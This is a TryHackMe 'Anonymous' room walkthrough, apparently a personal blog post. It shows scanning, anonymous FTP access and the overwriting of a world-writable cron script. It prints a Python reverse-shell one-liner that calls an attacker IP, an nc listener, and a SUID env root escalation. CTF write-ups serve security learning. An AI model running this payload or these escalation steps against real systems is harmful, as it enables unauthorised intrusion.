TryHackMe - Anonymous
· Updated: Jul 7, 2026 · TryHackMe · Challenge · Medium
Table of contents
TryHackMe - Anonymous
Room: https://tryhackme.com/room/anonymous
This is a beginner-friendly Linux box that covers basic enumeration, anonymous FTP access, and a simple privilege escalation path.
Enumeration
I started with a port scan to see what services were running.
rustscan -a 10.10.107.147 --ulimit 9999 -- -A
The scan showed four open ports.
Open 10.10.107.147:21
Open 10.10.107.147:22
Open 10.10.107.147:139
Open 10.10.107.147:445
Looking closer at the service versions:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.0.8 or later
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
I also checked the available SMB shares.
❯ smbclient -L 10.10.107.147
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\leon]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Gaining a Foothold
Since FTP was running, I tried logging in with the anonymous account.
❯ ftp 10.10.107.147
Connected to 10.10.107.147.
220 NamelessOne's FTP Server!
Name (10.10.107.147:leon): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Anonymous login worked. I listed the files and found a scripts directory.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1032 Nov 05 18:00 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
I downloaded everything to inspect locally.
ftp> mget *
The clean.sh script looked like it ran automatically.
❯ cat clean.sh removed_files.log to_do.txt
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
Running cleanup script: nothing to delete
...
I really need to disable the anonymous login...it's really not safe
Since the script was world-writable, I replaced it with a Python reverse shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.69.221",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I uploaded the new clean.sh, started a listener, and waited for the script to execute.
ftp> put clean.sh
❯ nc -lvnp 1234
Connection from 10.10.107.147:48228
/bin/sh: 0: can't access tty; job control turned off
$ ls
pics
user.txt
Privilege Escalation
I upgraded to a proper TTY.
python -c 'import pty; pty.spawn("/bin/bash")'
Then I looked for binaries that could be abused for privilege escalation.
find /usr/bin -perm -755 -print | sort
The env binary had the SUID bit set, which made it possible to spawn a root shell.
namelessone@anonymous:~$ /usr/bin/env /bin/bash -p
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
root.txt
We got root :)